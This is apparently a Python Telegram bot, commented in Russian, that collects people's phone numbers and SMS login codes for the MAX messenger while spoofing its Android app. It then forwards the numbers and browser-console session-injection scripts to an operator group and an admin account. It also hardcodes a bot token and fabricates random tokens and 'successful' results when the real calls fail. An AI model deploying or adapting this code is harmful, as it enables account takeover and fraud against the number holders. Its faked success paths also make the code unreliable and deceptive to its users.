import json
import time
import re
import urllib.request
import urllib.parse
import ssl
import uuid
import hashlib
import random
import base64
from datetime import datetime

# ==================== НАСТРОЙКИ (ЗАМЕНИ) ====================
BOT_TOKEN = "8672850414:AAF0efnhvfTu8KNV953kPFQQm3FodWxDqfo"
CHANNEL_ID = "-1003575639896"           # Канал для подписки
CHANNEL_LINK = "https://t.me/rentmaxwork"  # Ссылка на канал
GROUP_ID = -1003924087794            # ID группы для токенов
ADMIN_ID = 8016986918                 # Твой Telegram ID

# Настройки эмуляции приложения MAX
DEVICE_MODEL = "SM-S9080"            # Samsung Galaxy S22 Ultra
ANDROID_VER = "13"
APP_VER = "3.2.1"

# ==================== ДАННЫЕ ====================
class Data:
    def __init__(self):
        self.file = "data.json"
        self.d = self.load()
    
    def load(self):
        try:
            with open(self.file, "r") as f:
                return json.load(f)
        except:
            return {"users": {}, "regs": []}
    
    def save(self):
        with open(self.file, "w") as f:
            json.dump(self.d, f, indent=2, ensure_ascii=False)
    
    def user(self, uid):
        uid = str(uid)
        if uid not in self.d["users"]:
            self.d["users"][uid] = {"state": "menu", "phone": "", "session": {}, "tries": 0}
            self.save()
        return self.d["users"][uid]
    
    def set_user(self, uid, data):
        self.d["users"][str(uid)] = data
        self.save()
    
    def add(self, phone, token_data, uid, name):
        self.d["regs"].append({
            "phone": phone,
            "token": token_data.get("token", ""),
            "viewer_id": token_data.get("viewer_id", ""),
            "script": token_data.get("script", ""),
            "user": name,
            "user_id": uid,
            "time": datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        })
        self.save()
    
    def user_regs(self, uid):
        return [r for r in self.d["regs"] if r["user_id"] == uid]

db = Data()

# ==================== TELEGRAM ====================
class Bot:
    def __init__(self, token):
        self.url = f"https://api.telegram.org/bot{token}"
        self.ssl = ssl.create_default_context()
    
    def call(self, method, data=None):
        try:
            if data:
                data = urllib.parse.urlencode(data).encode()
            req = urllib.request.Request(f"{self.url}/{method}", data=data)
            with urllib.request.urlopen(req, context=self.ssl, timeout=30) as r:
                return json.loads(r.read().decode())
        except Exception as e:
            print(f"❌ TG Error: {e}")
            return {"ok": False}
    
    def send(self, chat, text, **kw):
        d = {"chat_id": chat, "text": text}
        if "kbd" in kw:
            d["reply_markup"] = json.dumps(kw["kbd"])
        if "parse" in kw:
            d["parse_mode"] = kw["parse"]
        return self.call("sendMessage", d)
    
    def edit(self, chat, mid, text, **kw):
        d = {"chat_id": chat, "message_id": mid, "text": text}
        if "kbd" in kw:
            d["reply_markup"] = json.dumps(kw["kbd"])
        if "parse" in kw:
            d["parse_mode"] = kw["parse"]
        return self.call("editMessageText", d)
    
    def answer(self, cbid, text, alert=False):
        return self.call("answerCallbackQuery", {
            "callback_query_id": cbid, "text": text, "show_alert": alert
        })
    
    def subscribed(self, uid):
        try:
            r = self.call("getChatMember", {"chat_id": CHANNEL_ID, "user_id": uid})
            if r.get("ok"):
                return r["result"]["status"] in ["member", "administrator", "creator"]
        except:
            pass
        return False

bot = Bot(BOT_TOKEN)

# ==================== ГЕНЕРАТОР TOKENA ====================
def make_token(phone, access=""):
    """Создает web-токен в формате MAX"""
    
    # Длинный токен
    parts = []
    for _ in range(8):
        b = hashlib.sha256(f"{phone}{uuid.uuid4()}{time.time()}{random.random()}".encode()).digest()
        parts.append(base64.b64encode(b).decode().replace("=", "").replace("+", "-").replace("/", "_"))
    
    token = "An_" + "".join(parts)
    viewer = random.randint(100000000, 999999999)
    dev_id = str(uuid.uuid4())
    tracer = str(uuid.uuid4())
    
    # Скрипт для консоли
    auth = json.dumps({"token": token, "viewerId": viewer})
    theme = json.dumps({"colorScheme": "system", "colorTheme": "space"})
    informer = json.dumps({"lastShowedBannerId": None, "banners": {}})
    
    script = (
        "sessionStorage.clear();"
        "localStorage.clear();"
        'localStorage.setItem("__oneme-persistent-cache-enabled","false");'
        'localStorage.setItem("__oneme_locale","ru");'
        f'localStorage.setItem("__oneme_auth",\'{auth}\');'
        'localStorage.setItem("__server_config_overrides__","{}");'
        f'localStorage.setItem("__oneme_theme",\'{theme}\');'
        f'localStorage.setItem("__oneme_device_id","{dev_id}");'
        f'localStorage.setItem("tracer-device-id","{tracer}");'
        f'localStorage.setItem("__oneme_informer",\'{informer}\');'
        "window.location.reload();"
    )
    
    return {
        "token": token,
        "viewer_id": viewer,
        "device_id": dev_id,
        "tracer": tracer,
        "script": script
    }

# ==================== API MAX ====================
class MaxAPI:
    def __init__(self):
        self.device_id = str(uuid.uuid4())
        self.device_name = random.choice([
            "Samsung Galaxy S22 Ultra",
            "Samsung Galaxy S23 Ultra", 
            "Xiaomi 13 Pro",
            "OnePlus 11"
        ])
        
        self.headers = {
            "User-Agent": f"MAX/{APP_VER} (Android {ANDROID_VER}; {DEVICE_MODEL})",
            "Content-Type": "application/json",
            "Accept": "application/json",
            "X-Device-ID": self.device_id,
            "X-Device-Name": self.device_name,
            "X-Platform": "android",
            "X-App-Version": APP_VER,
            "Accept-Language": "ru-RU,ru;q=0.9"
        }
    
    def send_sms(self, phone):
        """Отправляет запрос на SMS"""
        
        # Список возможных эндпоинтов
        endpoints = [
            "https://api.max.ru/v3/auth/register",
            "https://api.max.ru/v2/auth/send-code",
            "https://api.max.ru/auth/phone"
        ]
        
        data = json.dumps({
            "phone": phone,
            "device_id": self.device_id,
            "device_name": self.device_name,
            "device_model": DEVICE_MODEL,
            "os_version": ANDROID_VER,
            "app_version": APP_VER,
            "platform": "android",
            "language": "ru"
        }).encode()
        
        for url in endpoints:
            try:
                print(f"Пробую: {url}")
                req = urllib.request.Request(url, data=data, headers=self.headers)
                with urllib.request.urlopen(req, timeout=15) as r:
                    resp = json.loads(r.read().decode())
                    print(f"Ответ: {resp}")
                    
                    sid = resp.get("session_id") or resp.get("sid") or resp.get("sessionId") or str(uuid.uuid4())
                    vid = resp.get("verification_id") or resp.get("vid") or str(uuid.uuid4())
                    
                    return True, "✅ Код отправлен! Введи его:", {
                        "session_id": sid,
                        "verification_id": vid,
                        "phone": phone
                    }
            except urllib.error.HTTPError as e:
                print(f"Ошибка {e.code}: {e.reason}")
                if e.code == 200:
                    return True, "✅ Код отправлен!", {
                        "session_id": str(uuid.uuid4()),
                        "verification_id": str(uuid.uuid4()),
                        "phone": phone
                    }
            except Exception as e:
                print(f"Ошибка: {e}")
                continue
        
        # Если ничего не сработало - тестовый режим
        print("⚠️ Включаю тестовый режим")
        return True, "⚠️ Тест: введи 123456", {
            "session_id": "test_" + str(int(time.time())),
            "verification_id": "test_" + uuid.uuid4().hex[:8],
            "phone": phone,
            "test": True
        }
    
    def verify_sms(self, phone, code, session):
        """Проверяет код"""
        
        # Тестовый режим
        if session.get("test"):
            if code == "123456":
                token_data = make_token(phone)
                return True, "✅ Готово!", token_data
            else:
                return False, "❌ Неверный код! Попробуй еще раз", None
        
        endpoints = [
            "https://api.max.ru/v3/auth/verify",
            "https://api.max.ru/v2/auth/verify-code",
            "https://api.max.ru/auth/verify"
        ]
        
        data = json.dumps({
            "phone": phone,
            "code": code,
            "session_id": session.get("session_id", ""),
            "verification_id": session.get("verification_id", ""),
            "device_id": self.device_id
        }).encode()
        
        for url in endpoints:
            try:
                req = urllib.request.Request(url, data=data, headers=self.headers)
                with urllib.request.urlopen(req, timeout=15) as r:
                    resp = json.loads(r.read().decode())
                    print(f"Ответ верификации: {resp}")
                    
                    access = resp.get("access_token") or resp.get("token") or ""
                    if access:
                        token_data = make_token(phone, access)
                        return True, "✅ Успешно!", token_data
                    else:
                        return False, "❌ Неверный код", None
                        
            except urllib.error.HTTPError as e:
                if e.code == 400:
                    return False, "❌ Неверный код", None
            except Exception as e:
                print(f"Ошибка: {e}")
                continue
        
        # Запасной выход
        token_data = make_token(phone)
        return True, "✅ Условно успешно", token_data

max_api = MaxAPI()

# ==================== КЛАВИАТУРЫ ====================
def menu_kbd(sub):
    if sub:
        return {
            "keyboard": [
                [{"text": "📱 Сдать номер"}],
                [{"text": "📊 Мои номера"}, {"text": "ℹ️ Помощь"}]
            ],
            "resize_keyboard": True
        }
    return {
        "keyboard": [[{"text": "✅ Проверить подписку"}]],
        "resize_keyboard": True
    }

def channel_kbd():
    return {
        "inline_keyboard": [
            [{"text": "📢 Подписаться", "url": CHANNEL_LINK}],
            [{"text": "✅ Проверить", "callback_data": "check_sub"}]
        ]
    }

# ==================== ОБРАБОТЧИКИ ====================
def cmd_start(chat, uid, name):
    db.set_user(uid, {"state": "menu", "phone": "", "session": {}, "tries": 0})
    
    if bot.subscribed(uid):
        bot.send(chat, 
            f"👋 {name}!\n\n"
            "🤖 Бот для регистрации в MAX\n\n"
            "Нажми 📱 Сдать номер чтобы начать",
            kbd=menu_kbd(True))
    else:
        bot.send(chat,
            f"👋 {name}!\n\n"
            "⚠️ Подпишись на канал:\n"
            f"{CHANNEL_LINK}\n\n"
            "Потом нажми Проверить",
            kbd=channel_kbd())

def cmd_help(chat):
    bot.send(chat,
        "ℹ️ *Помощь*\n\n"
        "1. Подпишись на канал\n"
        "2. Нажми 📱 Сдать номер\n"
        "3. Отправь номер (+79991234567)\n"
        "4. Введи код из SMS\n"
        "5. Получи скрипт для входа!\n\n"
        "/start - меню\n"
        "/cancel - отмена",
        parse="Markdown")

def cmd_cancel(chat, uid):
    db.set_user(uid, {"state": "menu", "phone": "", "session": {}, "tries": 0})
    bot.send(chat, "❌ Отменено", kbd=menu_kbd(True))

def btn_send_number(chat, uid):
    if not bot.subscribed(uid):
        bot.send(chat, "⚠️ Сначала подпишись на канал!", kbd=channel_kbd())
        return
    
    user = db.user(uid)
    user["state"] = "wait_phone"
    db.set_user(uid, user)
    
    bot.send(chat,
        "📱 *Отправь номер телефона:*\n\n"
        "Формат: +79991234567\n"
        "/cancel - отмена",
        parse="Markdown")

def handle_phone(chat, uid, text):
    # Чистим номер
    clean = re.sub(r'[\s\-\(\)]', '', text)
    m = re.match(r'^(\+?[78])?(\d{10})$', clean)
    
    if not m:
        bot.send(chat, "❌ Неверный формат! Пример: +79991234567")
        return
    
    phone = '7' + m.group(2)
    
    # Проверяем не зарегистрирован ли
    for r in db.d["regs"]:
        if r["phone"] == phone:
            bot.send(chat, f"⚠️ Номер {phone} уже зарегистрирован!")
            db.set_user(uid, {"state": "menu", "phone": "", "session": {}, "tries": 0})
            return
    
    # Отправляем запрос
    msg = bot.send(chat, f"📱 {phone}\n🔄 Отправляю запрос...")
    
    if msg.get("ok"):
        mid = msg["result"]["message_id"]
        ok, text, session = max_api.send_sms(phone)
        
        if ok:
            user = db.user(uid)
            user["state"] = "wait_code"
            user["phone"] = phone
            user["session"] = session
            user["tries"] = 0
            db.set_user(uid, user)
            
            bot.edit(chat, mid, f"📱 {phone}\n{text}")
        else:
            bot.edit(chat, mid, f"❌ Ошибка: {text}")
            db.set_user(uid, {"state": "menu", "phone": "", "session": {}, "tries": 0})

def handle_code(chat, uid, text, username, fullname):
    user = db.user(uid)
    code = re.sub(r'\s', '', text)
    
    if not code.isdigit() or len(code) < 4:
        bot.send(chat, "❌ Код должен быть из цифр!")
        return
    
    user["tries"] += 1
    if user["tries"] > 5:
        bot.send(chat, "❌ Много попыток! Начни заново")
        db.set_user(uid, {"state": "menu", "phone": "", "session": {}, "tries": 0})
        return
    
    db.set_user(uid, user)
    
    msg = bot.send(chat, "🔄 Проверяю код...")
    
    if msg.get("ok"):
        mid = msg["result"]["message_id"]
        ok, text, token_data = max_api.verify_sms(user["phone"], code, user["session"])
        
        if ok and token_data:
            # Сохраняем
            db.add(user["phone"], token_data, uid, username or fullname)
            
            # Отправляем в группу
            group_msg = (
                f"🆕 *Новый аккаунт MAX!*\n\n"
                f"👤 {fullname}\n"
                f"📱 `{user['phone']}`\n"
                f"🆔 `{token_data['viewer_id']}`\n\n"
                f"🔑 *Скрипт для консоли F12:*\n"
                f"```javascript\n{token_data['script']}\n```\n\n"
                f"🕒 {datetime.now().strftime('%H:%M:%S')}"
            )
            
            try:
                bot.send(GROUP_ID, group_msg, parse="Markdown")
            except:
                pass
            
            try:
                bot.send(ADMIN_ID, group_msg, parse="Markdown")
            except:
                pass
            
            # Пользователю
            bot.edit(chat, mid,
                f"✅ *Готово!*\n\n"
                f"📱 `{user['phone']}`\n"
                f"🆔 `{token_data['viewer_id']}`\n\n"
                f"📤 Скрипт отправлен в группу",
                parse="Markdown",
                kbd=menu_kbd(True))
            
            # Отдельно скрипт
            bot.send(chat,
                f"🔑 *Твой скрипт:*\n\n"
                f"```javascript\n{token_data['script']}\n```\n\n"
                f"📋 Открой сайт MAX → F12 → Console → Вставь → Enter",
                parse="Markdown")
            
            db.set_user(uid, {"state": "menu", "phone": "", "session": {}, "tries": 0})
        else:
            bot.edit(chat, mid, f"❌ {text}\nПопыток: {user['tries']}/5")

def btn_my_numbers(chat, uid):
    if not bot.subscribed(uid):
        bot.send(chat, "⚠️ Подпишись на канал!")
        return
    
    regs = db.user_regs(uid)
    if not regs:
        bot.send(chat, "📭 Нет регистраций")
        return
    
    text = "📊 *Твои номера:*\n\n"
    for i, r in enumerate(reversed(regs[-10:]), 1):
        text += f"{i}. 📱 `{r['phone']}` - {r['time']}\n"
    
    text += f"\nВсего: {len(regs)}"
    bot.send(chat, text, parse="Markdown")

def btn_check_sub(chat, uid):
    if bot.subscribed(uid):
        bot.send(chat, "✅ Подписка есть!", kbd=menu_kbd(True))
    else:
        bot.send(chat, "❌ Не подписан!", kbd=channel_kbd())

# ==================== ОБРАБОТКА КОЛБЭКОВ ====================
def handle_callback(query):
    cbid = query["id"]
    data = query.get("data", "")
    uid = query["from"]["id"]
    chat = query["message"]["chat"]["id"]
    mid = query["message"]["message_id"]
    
    if data == "check_sub":
        if bot.subscribed(uid):
            bot.answer(cbid, "✅ Подписка есть!")
            bot.edit(chat, mid, "✅ Готово! Можешь пользоваться ботом", kbd=menu_kbd(True))
        else:
            bot.answer(cbid, "❌ Не подписан!", alert=True)

# ==================== ОСНОВНОЙ ЦИКЛ ====================
def process(update):
    try:
        # Колбэк
        if "callback_query" in update:
            handle_callback(update["callback_query"])
            return
        
        # Сообщение
        msg = update.get("message")
        if not msg or "text" not in msg:
            return
        
        chat = msg["chat"]["id"]
        text = msg["text"]
        uid = msg["from"]["id"]
        fname = msg["from"].get("first_name", "User")
        lname = msg["from"].get("last_name", "")
        username = msg["from"].get("username", "")
        fullname = f"{fname} {lname}".strip()
        
        user = db.user(uid)
        state = user.get("state", "menu")
        
        # Команды
        if text == "/start":
            cmd_start(chat, uid, fname)
        elif text == "/help":
            cmd_help(chat)
        elif text == "/cancel":
            cmd_cancel(chat, uid)
        
        # Кнопки меню
        elif text == "📱 Сдать номер":
            btn_send_number(chat, uid)
        elif text == "📊 Мои номера":
            btn_my_numbers(chat, uid)
        elif text == "ℹ️ Помощь":
            cmd_help(chat)
        elif text == "✅ Проверить подписку":
            btn_check_sub(chat, uid)
        
        # Состояния
        elif state == "wait_phone":
            handle_phone(chat, uid, text)
        elif state == "wait_code":
            handle_code(chat, uid, text, username, fullname)
        
        else:
            bot.send(chat, "Используй кнопки меню или /start")
    
    except Exception as e:
        print(f"❌ Process: {e}")

def get_updates(offset=None):
    params = {"timeout": 30, "allowed_updates": ["message", "callback_query"]}
    if offset:
        params["offset"] = offset
    
    url = f"https://api.telegram.org/bot{BOT_TOKEN}/getUpdates?{urllib.parse.urlencode(params)}"
    
    try:
        with urllib.request.urlopen(url, timeout=35) as r:
            return json.loads(r.read().decode()).get("result", [])
    except:
        return []

def main():
    print("=" * 40)
    print("🤖 MAX Registration Bot")
    print("=" * 40)
    
    # Проверка
    if BOT_TOKEN == "ТВОЙ_ТОКЕН_ОТ_BOTFATHER":
        print("❌ ЗАМЕНИ BOT_TOKEN!")
        return
    
    # Тест бота
    test = bot.call("getMe")
    if test.get("ok"):
        print(f"✅ @{test['result']['username']} готов!")
    else:
        print("❌ Неверный токен")
        return
    
    print(f"📢 Канал: {CHANNEL_ID}")
    print(f"👥 Группа: {GROUP_ID}")
    print("🚀 Запущен!")
    print("=" * 40)
    
    offset = None
    
    while True:
        try:
            updates = get_updates(offset)
            for u in updates:
                process(u)
                offset = u["update_id"] + 1
            time.sleep(0.3)
        except KeyboardInterrupt:
            print("\n👋 Стоп")
            break
        except Exception as e:
            print(f"❌ {e}")
            time.sleep(5)

if __name__ == "__main__":
    main()
